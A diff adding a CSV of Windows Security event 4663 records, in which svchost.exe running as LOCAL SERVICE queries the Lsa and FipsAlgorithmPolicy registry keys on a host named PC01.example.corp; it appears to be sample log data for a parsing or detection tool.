+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452879</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452878</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452877</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452876</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452875</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452874</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452873</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452872</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452871</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452870</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452869</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452868</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452867</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452866</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452865</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452864</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452863</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
